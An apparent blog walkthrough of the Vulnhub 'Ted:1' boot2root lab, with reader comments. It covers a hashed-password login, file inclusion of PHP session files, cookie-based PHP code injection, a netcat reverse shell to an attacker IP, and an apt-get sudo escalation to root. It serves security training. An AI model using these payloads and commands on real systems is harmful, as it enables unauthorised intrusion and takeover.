Ted:1 Vulnhub Walkthrough
Today we are going to take a new challenge, Ted. The credit for making this VM machine goes to “Avraham Cohen” and it is a boot2root challenge where we have to root the server to complete the challenge. You can download this VM here
Security Level: Beginner
Penetrating Methodology:
Scanning
- Netdiscover
- NMAP
Enumeration
- Browsing the website
- Burpsuite
Exploitation
- Netcat
Privilege Escalation
- Sudo permission for the apt-get command
Walkthrough:
Scanning:
First thing first, scan the vulnerable machine using nmap
nmap -p- -A 192.168.1.10
Here we found that the only port open is port 80
Let’s take a look at what the port 80 has to offer, we open the IP address in the browser and we found a login page
Enumeration
We tried to attempt some common default passwords but remain unsuccessful, but found something different. There is no error message displayed on the webpage, when we took a look at the response in burp-suite we found that the response asks us to provide the password in hash form
Now we know how to supply but don’t know which specific hashing algorithm. So we tried multiple algorithms like MD5, MD4, SHA-1, RIPEMD, etc. And found that SHA-256 is the correct algorithm and it worked for hash value of admin as password.
Once logged in, we found a simple file browser which helps in reading files from the file system of the target environment. We tried to read the contents of /etc/passwd and it displayed the contents
As the file browser works as a File Inclusion module in the current web environment, we tried to exploit the File Inclusion module with Remote File Inclusion vulnerability but failed.
Then we tried to read various critical files but were only able to read files not of much worth, except the session details which are stored in the file system of the server in the following way
/var/lib/php/sessions/sess_<php session id>
Here we found that all the session cookies and their values are stored in the session file of the user
We tried exploiting user_pref cookie by inputting a small php code to get the output of the ifconfig command
The code we are trying to inject is
<?php system("ifconfig")?>
After encoding. the characters in URL encoding, the code looks something like this
%3c%3fphp%20system%28%22ifconfig%22%29%3f%3e
Exploitation
As we found that we are able to create a Remote Code Execution vulnerability, let’s try to get a netcat reverse shell
The php code we tried looks something like this
<?php system("nc 192.168.1.7 1234 -e /bin/bash")?>
After encoding into URL Encoding, the code looks something like this
%3c%3fphp%20system%28%22nc%20192.168.1.7%201234%20-e%20%2fbin%2fbash%22%29%3f%3e
Privilege Escalation
Once receiving a reverse shell, all we have to do is get the privilege escalated. After spawning a tty shell, we tried to check for sudo permissions of the current user(www-data)
sudo -l
Here we found that we can run the apt-get command with sudo privileges, let’s do that
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
You can find more details about privilege escalation through APT here
Author: Deepanshu is a Certified Ethical Hacker, Security Researcher, Pentester and Trainer at Ignite Technologies. Contact here
you didn’t mention how you find sha 256 algorithm.
See the comment below. The hash must be SHA256 and UPPERCASE.
Please make article on Content security policy (csp) how to find?, works, tools, exploitation.
How do I find the hash algorithm?
I can’t log in
Thanks!
See the comment below. The hash must be SHA256 and UPPERCASE.
I had to iterate through burpsuite and look for help online on this one before coming to the answer:
An invalid username provides a “Username is not correct” response.
A valid username with invalid password provides the response “Password or password hash is not correct, make sure to hash it before submit.”
A valid username with valid, but unhashed password provides “Password hash it not correct, make sure to hash it before submit.”
When you hash it, ensure that the hash is UPPERCASE – otherwise it will return the second message above.
A successful hash (using SHA256 – 8C6976E5B5410415BDE908BD4DEE15DFB167A9C873FC4BB8A81F6F2AB448A918) will return no listed error, with location “home.php”, as shown in the walkthrough, above.